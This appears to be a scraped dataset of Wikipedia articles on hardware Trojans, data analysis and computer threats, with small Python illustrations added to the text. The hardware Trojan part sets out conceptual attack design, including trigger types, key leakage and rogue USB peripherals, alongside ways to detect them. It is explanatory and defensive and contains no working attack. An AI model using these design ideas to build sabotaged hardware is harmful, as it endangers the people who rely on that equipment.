serious, malicious, design alteration can be especially relevant to government agencies. Resolving doubt about hardware integrity is one way to reduce technology vulnerabilities in the military, finance, energy and political sectors of an economy. Since fabrication of integrated circuits in untrustworthy factories is common, advanced detection techniques have emerged to discover when an adversary has hidden additional components in, or otherwise sabotaged, the circuit's function. An HT can be characterized by several methods such as by its physical representation, activation phase and its action phase. Alternative methods characterize the HT by trigger, payload and stealth. One of this physical Trojan characteristics is the type. The type of a Trojan can be either functional or parametric. A Trojan is functional if the adversary adds or deletes any transistors or gates to the original chip design. The other kind of Trojan, the parametric Trojan, modifies the original circuitry, e.g. thinning of wires, weakening of flip-flops or transistors, subjecting the chip to radiation, or using Focused Ion-Beams (FIB) to reduce the reliability of a chip. 
The size of a Trojan is its physical extension, or the number of components it is made of. Because a Trojan can consist of many components, the designer can distribute the parts of the malicious logic across the chip. The additional logic can occupy the chip wherever it is needed to modify, add, or remove a function. Malicious components can be scattered, called loose distribution, or consist of only a few components, called tight distribution, so that the malicious logic occupies only a small area of the chip layout. In some cases, high-effort adversaries may regenerate the layout so that the placement of the components of the IC is altered. In rare cases the chip dimension is altered. These changes are structural alterations. The typical Trojan is condition-based: it is triggered by sensors, internal logic states, a particular input pattern or an internal counter value. Condition-based Trojans are detectable with power traces to some degree when inactive. That is due to the leakage currents generated by the trigger or counter circuit activating the Trojan. Hardware Trojans can be triggered in different ways. A Trojan can be internally activated, which means it monitors one or more signals inside the IC. The malicious circuitry could wait for a countdown logic that an attacker added to the chip, so that the Trojan wakes after a specific time span. The opposite is externally activated. There can be malicious logic inside a chip that uses an antenna or other sensors the adversary can reach from outside the chip. For example, a Trojan could be inside the control system of a cruise missile. The owner of the missile does not know that the enemy will be able to switch off the rockets by radio. A Trojan which is always-on can be a reduced wire. A chip that is modified in this way produces errors or fails every time the wire is used intensely. Always-on circuits are hard to detect with power traces. In this context, combinational Trojans and sequential Trojans are distinguished. A combinational Trojan monitors internal signals until a specific condition happens. A sequential Trojan is also an internally activated condition-based circuit, but it monitors the internal signals and searches for sequences rather than for a specific state or condition as combinational Trojans do (a software illustration follows below). Extraction of secret keys by means of a hardware Trojan without detecting the Trojan requires that the Trojan uses a random signal or some cryptographic implementation itself. To avoid storing a cryptographic key in the Trojan itself, and to keep the Trojan small, a physical unclonable function can be used. 4 Physical unclonable functions are small in size and can have an identical layout while the cryptographic properties are different. An HT could modify the chip's function or change the chip's parametric properties (e.g. introduce a processing delay). Confidential information can also be transmitted to the adversary (transmission of key information). A relatively new threat vector to networks and network endpoints is an HT appearing as a physical peripheral device that is designed to interact with the network endpoint using the approved peripheral device's communication protocol. An example is a USB keyboard that hides all malicious processing cycles from the target network endpoint to which it is attached by communicating with that endpoint over unintended USB channels.
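As a purely software illustration of the trigger types described above (not real hardware), the sketch below models a combinational trigger that fires whenever one rare input pattern appears and a sequential trigger that fires only after a specific sequence of inputs has been observed; the patterns and sequences are arbitrary examples.

class CombinationalTrigger:
    """Fires whenever the current inputs match one rare pattern (no memory)."""

    def __init__(self, rare_pattern):
        self.rare_pattern = rare_pattern

    def step(self, inputs):
        return inputs == self.rare_pattern

class SequentialTrigger:
    """Fires only after a specific sequence of inputs has been seen in order."""

    def __init__(self, sequence):
        self.sequence = sequence
        self.state = 0   # how much of the sequence has been matched so far

    def step(self, inputs):
        if self.state < len(self.sequence) and inputs == self.sequence[self.state]:
            self.state += 1
        else:
            self.state = 1 if inputs == self.sequence[0] else 0
        return self.state == len(self.sequence)

comb = CombinationalTrigger((1, 0, 1, 1))
seq = SequentialTrigger([(0, 0), (1, 1), (0, 1)])
print(comb.step((1, 0, 1, 1)))                            # True: payload would activate
print([seq.step(x) for x in [(0, 0), (1, 1), (0, 1)]])    # [False, False, True]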
Once sensitive data is exfiltrated from the target network endpoint to the HT, the HT can process the data and decide what to do with it: store it in memory for later physical retrieval of the HT, or possibly exfiltrate it to the internet wirelessly or by using the compromised network endpoint as a pivot. 5 6 A common Trojan is passive for most of the time span in which an altered device is in use, but the activation can cause fatal damage. If a Trojan is activated, the functionality can be changed, the device can be destroyed or disabled, it can leak confidential information or tear down the security and safety. Trojans are stealthy, meaning that the precondition for activation is a very rare event. Traditional testing techniques are not sufficient. A manufacturing fault happens at a random position, while malicious changes are well placed to avoid detection. First, the molding coat is cut to reveal the circuitry. Then, the engineer repeatedly scans the surface while grinding the layers of the chip. There are several operations to scan the circuitry. Typical visual inspection methods are: scanning optical microscopy (SOM), scanning electron microscopy (SEM), 7 pico-second imaging circuit analysis (PICA), voltage contrast imaging (VCI), light induced voltage alteration (LIVA) or charge induced voltage alteration (CIVA). For comparison, the floor plan of the chip has to be compared with an image of the actual chip. This is still quite challenging to do. To detect Trojan hardware that includes different (crypto) keys, an image diff can be taken to reveal the differing structure on the chip. The only known hardware Trojan that uses unique crypto keys while keeping the same structure has been described in the literature. 8 This property enhances the undetectability of the Trojan. This detection method stimulates the input ports of a chip and monitors the output to detect manufacturing faults. If the logic values of the output do not match the genuine pattern, then a defect or a Trojan could be found. Built-in self-test (BIST) and Design For Test (DFT) techniques add circuitry (logic) to the chip intended to help verify that the chip, as built, implements its functional specification. The extra logic monitors input stimulus and internal signals or memory states, generally by computing checksums or by exposing internal registers via a customized scanning technique. Where DFT usually coordinates with some external testing mechanism, BIST-enabled chips incorporate custom test-pattern generators. BIST functionality often exists to perform at-speed (high speed) verification where it is not possible to use scan chains or other low-speed DFT capabilities. Both methods were originally developed to detect manufacturing errors, but also have the double-edged potential to detect some effects of malicious logic on the chip, or to be exploited by malicious logic to covertly inspect remote state within the chip. Consider how DFT recognizes unintended logic. When driven by DFT inputs, a genuine chip generates a familiar signature, but a defective or altered chip displays an unexpected signature. The signature may consist of any number of data outputs from the chip: an entire scan chain or intermediate data result. In a Trojan-detection context, DFT logic may be regarded as an encryption algorithm: using the DFT input as a key to sign a message derived from the behavior of the design under test.
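A hedged, software-only sketch of the signature idea above: a keyed digest is computed over simulated scan-chain outputs for a golden model and for a device under test, and a mismatch flags a possible defect or hidden logic. The toy chip functions and the HMAC construction are illustrative stand-ins, not an actual DFT flow.

import hmac
import hashlib

def scan_outputs(chip, test_patterns):
    # Collect the chip's responses to a fixed set of DFT test patterns.
    return b"".join(chip(p) for p in test_patterns)

def signature(dft_key, outputs):
    # The DFT input acts like a key signing a message derived from the chip's behavior.
    return hmac.new(dft_key, outputs, hashlib.sha256).hexdigest()

def golden_chip(pattern):
    return bytes(b ^ 0x5A for b in pattern)          # toy "genuine" behavior

def altered_chip(pattern):
    out = bytearray(b ^ 0x5A for b in pattern)
    out[0] ^= 0x01                                    # one flipped bit: hidden extra logic
    return bytes(out)

patterns = [bytes([i, i + 1, i + 2]) for i in range(0, 12, 3)]
key = b"dft-stimulus-key"
reference = signature(key, scan_outputs(golden_chip, patterns))
under_test = signature(key, scan_outputs(altered_chip, patterns))
print("signatures match:", reference == under_test)   # False: unexpected signature, investigate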
In an intrusion-avoidance context, BIST or DFT functions are typically disabled (by hardware-reconfiguration) outside of a manufacturing environment because their access to the chip's internal state can expose its function to covert surveillance or subversive attack. Every device that is electrically active emits different signals like magnetic and electric fields. Those signals that are caused by the electric activity, can be analyzed to gain information about the state and the data which the device processes. Advanced methods to measure these side-effects have been developed and they are very sensitive (side-channel attack). Hence, it is possible to detect tightly coupled Trojans via measurement of these analog signals. The measured values can be used as a signature for the analyzed device. It is also common that a set of measured values is evaluated to avoid measurement errors or other inaccuracies. 9 |
438 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_analysis | Data analysis is the process of inspecting, cleansing, transforming, and modeling data with the goal of discovering useful information, informing conclusions, and supporting decision-making. 1 Data analysis has multiple facets and approaches, encompassing diverse techniques under a variety of names, and is used in different business, science, and social science domains. 2 In today's business world, data analysis plays a role in making decisions more scientific and helping businesses operate more effectively. 3 Data mining is a particular data analysis technique that focuses on statistical modeling and knowledge discovery for predictive rather than purely descriptive purposes, while business intelligence covers data analysis that relies heavily on aggregation, focusing mainly on business information. 4 In statistical applications, data analysis can be divided into descriptive statistics, exploratory data analysis (EDA), and confirmatory data analysis (CDA). 5 EDA focuses on discovering new features in the data while CDA focuses on confirming or falsifying existing hypotheses. 6 7 Predictive analytics focuses on the application of statistical models for predictive forecasting or classification, while text analytics applies statistical, linguistic, and structural techniques to extract and classify information from textual sources, a species of unstructured data. All of the above are varieties of data analysis. 8 Data integration is a precursor to data analysis, and data analysis is closely linked to data visualization and data dissemination. 9 Analysis refers to dividing a whole into its separate components for individual examination. 10 Data analysis is a process for obtaining raw data, and subsequently converting it into information useful for decision-making by users. 1 Data is collected and analyzed to answer questions, test hypotheses, or disprove theories. 11 Statistician John Tukey, defined data analysis in 1961, as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data. 12 There are several phases that can be distinguished, described below. The phases are iterative, in that feedback from later phases may result in additional work in earlier phases. 13 The CRISP framework, used in data mining, has similar steps. The data is necessary as inputs to the analysis, which is specified based upon the requirements of those directing the analytics (or customers, who will use the finished product of the analysis). 14 15 The general type of entity upon which the data will be collected is referred to as an experimental unit (e.g., a person or population of people). Specific variables regarding a population (e.g., age and income) may be specified and obtained. Data may be numerical or categorical (i.e., a text label for numbers). 13 Data is collected from a variety of sources. 16 17 A list of data sources are available for study research. The requirements may be communicated by analysts to custodians of the data; such as, Information Technology personnel within an organization. 
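Because pandas is already imported at the top of this notebook, the organize-then-describe workflow above can be sketched directly; the column names and values are invented example data.

import pandas as pd

# Raw observations organized into rows and columns (structured data).
df = pd.DataFrame({
    "age": [34, 29, 41, 52, 38],
    "income": [48000, 52000, 61000, 75000, 58000],
    "region": ["north", "south", "south", "west", "north"],
})

# Descriptive statistics for the numerical variables.
print(df[["age", "income"]].describe())

# Frequency counts summarize a categorical variable.
print(df["region"].value_counts())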
18 Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. The data may also be collected from sensors in the environment, including traffic cameras, satellites, recording devices, etc. It may also be obtained through interviews, downloads from online sources, or reading documentation. 13 Data, when initially obtained, must be processed or organized for analysis. 19 20 For instance, these may involve placing data into rows and columns in a table format (known as structured data) for further analysis, often through the use of spreadsheet or statistical software. 13 Once processed and organized, the data may be incomplete, contain duplicates, or contain errors. 21 22 The need for data cleaning will arise from problems in the way that the datum are entered and stored. 21 Data cleaning is the process of preventing and correcting these errors. Common tasks include record matching, identifying inaccuracy of data, overall quality of existing data, deduplication, and column segmentation. 23 Such data problems can also be identified through a variety of analytical techniques. For example; with financial information, the totals for particular variables may be compared against separately published numbers that are believed to be reliable. 24 25 Unusual amounts, above or below predetermined thresholds, may also be reviewed. There are several types of data cleaning, that are dependent upon the type of data in the set; this could be phone numbers, email addresses, employers, or other values. 26 27 Quantitative data methods for outlier detection, can be used to get rid of data that appears to have a higher likelihood of being input incorrectly. 28 Textual data spell checkers can be used to lessen the amount of mistyped words. However, it is harder to tell if the words themselves are correct. 29 Once the datasets are cleaned, they can then be analyzed. Analysts may apply a variety of techniques, referred to as exploratory data analysis, to begin understanding the messages contained within the obtained data. 30 The process of data exploration may result in additional data cleaning or additional requests for data; thus, the initialization of the iterative phases mentioned in the lead paragraph of this section. 31 Descriptive statistics, such as, the average or median, can be generated to aid in understanding the data. 32 33 Data visualization is also a technique used, in which the analyst is able to examine the data in a graphical format in order to obtain additional insights, regarding the messages within the data. 13 Mathematical formulas or models (also known as algorithms), may be applied to the data in order to identify relationships among the variables; for example, using correlation or causation. 34 35 In general terms, models may be developed to evaluate a specific variable based on other variable(s) contained within the dataset, with some residual error depending on the implemented model's accuracy (e.g., Data Model Error). 36 11 Inferential statistics includes utilizing techniques that measure the relationships between particular variables. 37 For example, regression analysis may be used to model whether a change in advertising (independent variable X), provides an explanation for the variation in sales (dependent variable Y). 38 In mathematical terms, Y (sales) is a function of X (advertising). 
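A minimal pandas sketch of the cleaning steps described above (deduplication and a simple quantitative outlier screen); the column names, the toy values, and the 1.5 x IQR rule are illustrative assumptions rather than a general recipe.

import pandas as pd

raw = pd.DataFrame({
    "customer": ["a", "a", "b", "c", "d"],
    "spend": [120.0, 120.0, 95.0, 20000.0, 110.0],   # 20000 looks like an entry error
})

# 1. Record matching / deduplication.
clean = raw.drop_duplicates()

# 2. Quantitative outlier screen using the interquartile range.
q1, q3 = clean["spend"].quantile([0.25, 0.75])
iqr = q3 - q1
within_range = clean["spend"].between(q1 - 1.5 * iqr, q3 + 1.5 * iqr)
clean = clean[within_range]

print(clean)   # the duplicate row and the 20000.0 entry are gone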
39 It may be described as (Y = aX + b + error), where the model is designed such that a and b minimize the error when the model predicts Y for a given range of values of X. 40 Analysts may also attempt to build models that are descriptive of the data, in an effort to simplify analysis and communicate results. 11 A data product is a computer application that takes data inputs and generates outputs, feeding them back into the environment. 41 It may be based on a model or algorithm. For instance, an application might analyze data about customer purchase history and use the results to recommend other purchases the customer might enjoy. 42 13 Once data is analyzed, it may be reported in many formats to the users of the analysis to support their requirements. 44 The users may have feedback, which results in additional analysis. As such, much of the analytical cycle is iterative. 13 When determining how to communicate the results, the analyst may consider implementing a variety of data visualization techniques to help communicate the message more clearly and efficiently to the audience. 45 Data visualization uses information displays (graphics such as tables and charts) to help communicate key messages contained in the data. 46 Tables are a valuable tool because they enable a user to query and focus on specific numbers, while charts (e.g., bar charts or line charts) may help explain the quantitative messages contained in the data. 47 Stephen Few described eight types of quantitative messages that users may attempt to understand or communicate from a set of data, along with the associated graphs used to help communicate the message. 48 Customers specifying requirements and analysts performing the data analysis may consider these messages during the course of the process. 49 Author Jonathan Koomey has recommended a series of best practices for understanding quantitative data. 60 For the variables under examination, analysts typically obtain descriptive statistics, such as the mean (average), median, and standard deviation. 61 They may also analyze the distribution of the key variables to see how the individual values cluster around the mean. 62 The consultants at McKinsey and Company named a technique for breaking a quantitative problem down into its component parts the MECE principle. 63 Each layer can be broken down into its components; each of the sub-components must be mutually exclusive of each other and collectively add up to the layer above them. 64 The relationship is referred to as "Mutually Exclusive and Collectively Exhaustive" or MECE. For example, profit by definition can be broken down into total revenue and total cost. 65 In turn, total revenue can be analyzed by its components, such as the revenue of divisions A, B, and C (which are mutually exclusive of each other), which should add up to the total revenue (collectively exhaustive). 66 Analysts may use robust statistical measurements to solve certain analytical problems. 67 Hypothesis testing is used when a particular hypothesis about the true state of affairs is made by the analyst and data is gathered to determine whether that state of affairs is true or false. 68 69 For example, the hypothesis might be that "Unemployment has no effect on inflation", which relates to an economics concept called the Phillips Curve. 70 Hypothesis testing involves considering the likelihood of Type I and Type II errors, which relate to whether the data supports accepting or rejecting the hypothesis.
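A small sketch of the regression formulation above, estimating a and b by least squares; the advertising and sales figures are fabricated purely to show the mechanics.

import numpy as np

advertising = np.array([1.0, 2.0, 3.0, 4.0, 5.0])   # X, the independent variable
sales = np.array([2.1, 3.9, 6.2, 8.1, 9.8])         # Y, roughly 2*X plus noise

# Fit Y = aX + b so that the squared error term is minimized.
a, b = np.polyfit(advertising, sales, deg=1)
residuals = sales - (a * advertising + b)

print("a = %.2f, b = %.2f" % (a, b))        # estimated slope and intercept
print("residual error:", np.round(residuals, 2))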
71 72 Regression analysis may be used when the analyst is trying to determine the extent to which independent variable X affects dependent variable Y (e.g., "To what extent do changes in the unemployment rate (X) affect the inflation rate (Y)? ). 73 This is an attempt to model or fit an equation line or curve to the data, such that Y is a function of X. 74 75 Necessary condition analysis (NCA) may be used when the analyst is trying to determine the extent to which independent variable X allows variable Y (e.g., "To what extent is a certain unemployment rate (X) necessary for a certain inflation rate (Y)? ). 73 Whereas (multiple) regression analysis uses additive logic where each X-variable can produce the outcome and the X's can compensate for each other (they are sufficient but not necessary), 76 necessary condition analysis (NCA) uses necessity logic, where one or more X-variables allow the outcome to exist, but may not produce it (they are necessary but not sufficient). Each single necessary condition must be present and compensation is not possible. 77 Users may have particular data points of interest within a data set, as opposed to the general messaging outlined above. Such low-level user analytic activities are presented in the following table. The taxonomy can also be organized by three poles of activities: retrieving values, finding data points, and arranging data points. 78 79 80 81 - How long is the movie Gone with the Wind? - What comedies have won awards? - Which funds underperformed the SP 500? - What is the gross income of all stores combined? - How many manufacturers of cars are there? - What director film has won the most awards? - What Marvel Studios film has the most recent release date? - Rank the cereals by calories. - What is the range of car horsepowers? - What actresses are in the data set? - What is the age distribution of shoppers? - Are there any outliers in protein? - Is there a cluster of typical film lengths? - Is there a correlation between country of origin and MPG? - Do different genders have a preferred payment method? - Is there a trend of increasing film length over the years? Barriers to effective analysis may exist among the analysts performing the data analysis or among the audience. Distinguishing fact from opinion, cognitive biases, and innumeracy are all challenges to sound data analysis. 82 You are entitled to your own opinion, but you are not entitled to your own facts. Daniel Patrick Moynihan Effective analysis requires obtaining relevant facts to answer questions, support a conclusion or formal opinion, or test hypotheses. 83 84 Facts by definition are irrefutable, meaning that any person involved in the analysis should be able to agree upon them. 85 For example, in August 2010, the Congressional Budget Office (CBO) estimated that extending the Bush tax cuts of 2001 and 2003 for the 2011 2020 time period would add approximately $3.3 trillion to the national debt. 86 Everyone should be able to agree that indeed this is what CBO reported; they can all examine the report. This makes it a fact. Whether persons agree or disagree with the CBO is their own opinion. 87 As another example, the auditor of a public company must arrive at a formal opinion on whether financial statements of publicly traded corporations are "fairly stated, in all material respects". 88 This requires extensive analysis of factual data and evidence to support their opinion. 
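The low-level analytic activities sampled above (retrieve a value, filter, compute a derived value, find an extremum, sort) map directly onto pandas operations; the film table below is a made-up stand-in for such a data set.

import pandas as pd

films = pd.DataFrame({
    "title": ["A", "B", "C", "D"],
    "genre": ["comedy", "drama", "comedy", "action"],
    "awards": [3, 1, 5, 0],
    "length_min": [98, 121, 105, 132],
})

print(films.loc[films["title"] == "A", "length_min"].iloc[0])   # retrieve a value
print(films[films["genre"] == "comedy"])                        # filter
print(films["length_min"].mean())                               # compute a derived value
print(films.loc[films["awards"].idxmax(), "title"])             # find an extremum
print(films.sort_values("length_min")["title"].tolist())        # sort / rank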
When making the leap from facts to opinions, there is always the possibility that the opinion is erroneous. 89 There are a variety of cognitive biases that can adversely affect analysis. For example, confirmation bias is the tendency to search for or interpret information in a way that confirms one's preconceptions. 90 In addition, individuals may discredit information that does not support their views. 91 Analysts may be trained specifically to be aware of these biases and how to overcome them. 92 In his book Psychology of Intelligence Analysis, retired CIA analyst Richards Heuer wrote that analysts should clearly delineate their assumptions and chains of inference and specify the degree and source of the uncertainty involved in the conclusions. 93 He emphasized procedures to help surface and debate alternative points of view. 94 Effective analysts are generally adept with a variety of numerical techniques. However, audiences may not have such literacy with numbers or numeracy; they are said to be innumerate. 95 Persons communicating the data may also be attempting to mislead or misinform, deliberately using bad numerical techniques. 96 For example, whether a number is rising or falling may not be the key factor. More important may be the number relative to another number, such as the size of government revenue or spending relative to the size of the economy (GDP) or the amount of cost relative to revenue in corporate financial statements. 97 This numerical technique is referred to as normalization 25 or common-sizing. There are many such techniques employed by analysts, whether adjusting for inflation (i.e., comparing real vs. nominal data) or considering population increases, demographics, etc. 98 Analysts apply a variety of techniques to address the various quantitative messages described in the section above. 99 Analysts may also analyze data under different assumptions or scenario. For example, when analysts perform financial statement analysis, they will often recast the financial statements under different assumptions to help arrive at an estimate of future cash flow, which they then discount to present value based on some interest rate, to determine the valuation of the company or its stock. 100 101 Similarly, the CBO analyzes the effects of various policy options on the government's revenue, outlays and deficits, creating alternative future scenarios for key measures. 102 A data analytics approach can be used in order to predict energy consumption in buildings. 103 The different steps of the data analysis process are carried out in order to realise smart buildings, where the building management and control operations including heating, ventilation, air conditioning, lighting and security are realised automatically by miming the needs of the building users and optimising resources like energy and time. 104 Analytics is the "extensive use of data, statistical and quantitative analysis, explanatory and predictive models, and fact-based management to drive decisions and actions. It is a subset of business intelligence, which is a set of technologies and processes that uses data to understand and analyze business performance to drive decision-making . 105 In education, most educators have access to a data system for the purpose of analyzing student data. 
106 These data systems present data to educators in an over-the-counter data format (embedding labels, supplemental documentation, and a help system and making key package display and content decisions) to improve the accuracy of educators’ data analyses. 107 This section contains rather technical explanations that may assist practitioners but are beyond the typical scope of a Wikipedia article. 108 The most important distinction between the initial data analysis phase and the main analysis phase, is that during initial data analysis one refrains from any analysis that is aimed at answering the original research question. 109 The initial data analysis phase is guided by the following four questions: 110 The quality of the data should be checked as early as possible. Data quality can be assessed in several ways, using different types of analysis: frequency counts, descriptive statistics (mean, standard deviation, median), normality (skewness, kurtosis, frequency histograms), normal imputation is needed. 111 The choice of analyses to assess the data quality during the initial data analysis phase depends on the analyses that will be conducted in the main analysis phase. 114 The quality of the measurement instruments should only be checked during the initial data analysis phase when this is not the focus or research question of the study. 115 116 One should check whether structure of measurement instruments corresponds to structure reported in the literature. There are two ways to assess measurement quality: After assessing the quality of the data and of the measurements, one might decide to impute missing data, or to perform initial transformations of one or more variables, although this can also be done during the main analysis phase. 119 Possible transformations of variables are: 120 One should check the success of the randomization procedure, for instance by checking whether background and substantive variables are equally distributed within and across groups. 121 If the study did not need or use a randomization procedure, one should check the success of the non-random sampling, for instance by checking whether all subgroups of the population of interest are represented in sample. 122 Other possible data distortions that should be checked are: In any report or article, the structure of the sample must be accurately described. 124 125 It is especially important to exactly determine the structure of the sample (and specifically the size of the subgroups) when subgroup analyses will be performed during the main analysis phase. 126 The characteristics of the data sample can be assessed by looking at: During the final stage, the findings of the initial data analysis are documented, and necessary, preferable, and possible corrective actions are taken. 128 Also, the original plan for the main data analyses can and should be specified in more detail or rewritten. 129 In order to do this, several decisions about the main data analyses can and should be made: Several analyses can be used during the initial data analysis phase: 131 It is important to take the measurement levels of the variables into account for the analyses, as special statistical techniques are available for each level: 132 Nonlinear analysis is often necessary when the data is recorded from a nonlinear system. Nonlinear systems can exhibit complex dynamic effects including bifurcations, chaos, harmonics and subharmonics that cannot be analyzed using simple linear methods. 
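A hedged sketch of the initial data-quality checks listed above, using pandas built-ins; which checks matter depends on the analyses planned for the main phase, and the toy frame here is purely illustrative.

import pandas as pd

df = pd.DataFrame({
    "score": [1.2, 2.4, 2.9, None, 3.1, 40.0],
    "group": ["a", "a", "b", "b", "a", "b"],
})

print(df.isna().sum())              # missing-value counts per column
print(df["score"].describe())       # mean, standard deviation, quartiles
print("skewness:", df["score"].skew())
print("kurtosis:", df["score"].kurt())
print(df["group"].value_counts())   # frequency counts for a categorical variable

# Crude randomization check: is a background variable balanced across groups?
print(df.groupby("group")["score"].mean())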
Nonlinear data analysis is closely related to nonlinear system identification. 133 In the main analysis phase, analyses aimed at answering the research question are performed as well as any other relevant analysis needed to write the first draft of the research report. 134 In the main analysis phase, either an exploratory or confirmatory approach can be adopted. Usually the approach is decided before data is collected. 135 In an exploratory analysis no clear hypothesis is stated before analysing the data, and the data is searched for models that describe the data well. 136 In a confirmatory analysis clear hypotheses about the data are tested. 137 Exploratory data analysis should be interpreted carefully. When testing multiple models at once there is a high chance on finding at least one of them to be significant, but this can be due to a type 1 error. 138 It is important to always adjust the significance level when testing multiple models with, for example, a Bonferroni correction. 139 Also, one should not follow up an exploratory analysis with a confirmatory analysis in the same dataset. 140 An exploratory analysis is used to find ideas for a theory, but not to test that theory as well. 140 When a model is found exploratory in a dataset, then following up that analysis with a confirmatory analysis in the same dataset could simply mean that the results of the confirmatory analysis are due to the same type 1 error that resulted in the exploratory model in the first place. 140 The confirmatory analysis therefore will not be more informative than the original exploratory analysis. 141 It is important to obtain some indication about how generalizable the results are. 142 While this is often difficult to check, one can look at the stability of the results. Are the results reliable and reproducible? There are two main ways of doing that. 143 Notable free software for data analysis include: The typical data analysis workflow involves collecting data, running analyses through various scripts, creating visualizations, and writing reports. However, this workflow presents challenges, including a separation between analysis scripts and data, as well as a gap between analysis and documentation. Often, the correct order of running scripts is only described informally or resides in the data scientist's memory. The potential for losing this information creates issues for reproducibility. To address these challenges, it is essential to have analysis scripts written for automated, reproducible workflows. Additionally, dynamic documentation is crucial, providing reports that are understandable by both machines and humans, ensuring accurate representation of the analysis workflow even as scripts evolve. 150 Different companies or organizations hold data analysis contests to encourage researchers to utilize their data or to solve a particular question using data analysis. 151 152 A few examples of well-known international data analysis contests are as follows: 153 |
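The multiple-testing caution above can be made concrete with the Bonferroni correction it mentions; the p-values below are invented.

alpha = 0.05
p_values = [0.003, 0.04, 0.20, 0.01, 0.049]   # one p-value per model tested

# Bonferroni correction: divide the significance level by the number of tests.
adjusted_alpha = alpha / len(p_values)

still_significant = [p for p in p_values if p < adjusted_alpha]
print("adjusted alpha = %.3f" % adjusted_alpha)
print("significant after correction:", still_significant)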
439 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Threat_(computer) | In computer security, a threat is a potential negative action or event enabled by a vulnerability that results in an unwanted impact to a computer system or application. A threat can be either a negative "intentional" event (i.e. hacking: an individual cracker or a criminal organization) or an "accidental" negative event (e.g. the possibility of a computer malfunctioning, or the possibility of a natural disaster event such as an earthquake, a fire, or a tornado) or otherwise a circumstance, capability, action, or event (incident is often used as a blanket term). 1 A threat actor is an individual or group that can perform the threat action, such as exploiting a vulnerability to actualise a negative impact. An exploit is a vulnerability that a threat actor uses to cause an incident. A more comprehensive definition, tied to an information assurance point of view, can be found in "Federal Information Processing Standards (FIPS) 200, Minimum Security Requirements for Federal Information and Information Systems" by NIST of the United States of America. 2 The National Information Assurance Glossary defines threat as: ENISA gives a similar definition: 3 The Open Group defines threat as: 4 Factor analysis of information risk defines threat as: 5 The National Information Assurance Training and Education Center gives a more articulated definition of threat: 6 7 The term "threat" relates to several other basic security terms. 1 A resource (physical or logical) can have one or more vulnerabilities that can be exploited by a threat agent in a threat action. The result can potentially compromise the confidentiality, integrity or availability properties of resources (potentially different from the vulnerable one) of the organization and other involved parties (customers, suppliers). The so-called CIA triad is the basis of information security. An attack is active when it attempts to alter system resources or affect their operation, so it compromises integrity or availability. A "passive attack" attempts to learn or make use of information from the system but does not affect system resources, so it compromises confidentiality. 1 OWASP depicts the same phenomenon in slightly different terms: a threat agent, through an attack vector, exploits a weakness (vulnerability) of the system and the related security controls, causing a technical impact on an IT resource (asset) that is connected to a business impact. A set of policies concerned with information security management, the information security management system (ISMS), has been developed to manage, according to risk management principles, the countermeasures needed to accomplish a security strategy set up following the rules and regulations applicable in a country. Countermeasures are also called security controls; when applied to the transmission of information they are named security services. 8 The overall picture represents the risk factors of the risk scenario. 9 The widespread dependence on computers, and the consequent rise in the impact of a successful attack, led to a new term: cyberwarfare. Nowadays many real attacks exploit psychology at least as much as technology. Phishing, pretexting, and other methods are called social engineering techniques.
10 The Web 2.0 applications, specifically Social network services, can be a mean to get in touch with people in charge of system administration or even system security, inducing them to reveal sensitive information. 11 One famous case is Robin Sage. 12 The most widespread documentation on computer insecurity is about technical threats such as a computer virus, trojan and other malware, but a serious study to apply cost effective countermeasures can only be conducted following a rigorous IT risk analysis in the framework of an ISMS: a pure technical approach will let out the psychological attacks that are increasing threats. Threats can be classified according to their type and origin: 13 Note that a threat type can have multiple origins. Recent trends in computer threats show an increase in ransomware attacks, supply chain attacks, and fileless malware. Ransomware attacks involve the encryption of a victim's files and a demand for payment to restore access. Supply chain attacks target the weakest links in a supply chain to gain access to high-value targets. Fileless malware attacks use techniques that allow malware to run in memory, making it difficult to detect. 14 Below are the few common emerging threats: Computer viruses Trojan horses Worms Rootkits Spyware Adware Ransomware Fileless malware Microsoft published a mnemonic, STRIDE, 15 from the initials of threat groups: Microsoft previously rated the risk of security threats using five categories in a classification called DREAD: Risk assessment model. The model is considered obsolete by Microsoft. The categories were: The DREAD name comes from the initials of the five categories listed. The spread over a network of threats can lead to dangerous situations. In military and civil fields, threat level has been defined: for example INFOCON is a threat level used by the US. Leading antivirus software vendors publish global threat level on their websites. 16 17 The term Threat Agent is used to indicate an individual or group that can manifest a threat. It is fundamental to identify who would want to exploit the assets of a company, and how they might use them against the company. 18 Individuals within a threat population; Practically anyone and anything can, under the right circumstances, be a threat agent the well-intentioned, but inept, computer operator who trashes a daily batch job by typing the wrong command, the regulator performing an audit, or the squirrel that chews through a data cable. 5 Threat agents can take one or more of the following actions against an asset: 5 Each of these actions affects different assets differently, which drives the degree and nature of loss. For example, the potential for productivity loss resulting from a destroyed or stolen asset depends upon how critical that asset is to the organization's productivity. If a critical asset is simply illicitly accessed, there is no direct productivity loss. Similarly, the destruction of a highly sensitive asset that does not play a critical role in productivity would not directly result in a significant productivity loss. Yet that same asset, if disclosed, can result in significant loss of competitive advantage or reputation, and generate legal costs. The point is that it is the combination of the asset and type of action against the asset that determines the fundamental nature and degree of loss. Which action(s) a threat agent takes will be driven primarily by that agent's motive (e.g., financial gain, revenge, recreation, etc.) and the nature of the asset. 
For example, a threat agent bent on financial gain is less likely to destroy a critical server than they are to steal an easily pawned asset like a laptop. 5 It is important to separate the concept of the event that a threat agent get in contact with the asset (even virtually, i.e. through the network) and the event that a threat agent act against the asset. 5 OWASP collects a list of potential threat agents to prevent system designers, and programmers insert vulnerabilities in the software. 18 Threat Agent Capabilities Intentions Past Activities These individuals and groups can be classified as follows: 18 Threat sources are those who wish a compromise to occur. It is a term used to distinguish them from threat agents actors who are those who carry out the attack and who may be commissioned or persuaded by the threat source to knowingly or unknowingly carry out the attack. 19 Threat action is an assault on system security. A complete security architecture deals with both intentional acts (i.e. attacks) and accidental events. 20 Various kinds of threat actions are defined as subentries under "threat consequence". Threat analysis is the analysis of the probability of occurrences and consequences of damaging actions to a system. 1 It is the basis of risk analysis. Threat modeling is a process that helps organizations identify and prioritize potential threats to their systems. It involves analyzing the system's architecture, identifying potential threats, and prioritizing them based on their impact and likelihood. By using threat modeling, organizations can develop a proactive approach to security and prioritize their resources to address the most significant risks. 21 Threat intelligence is the practice of collecting and analyzing information about potential and current threats to an organization. This information can include indicators of 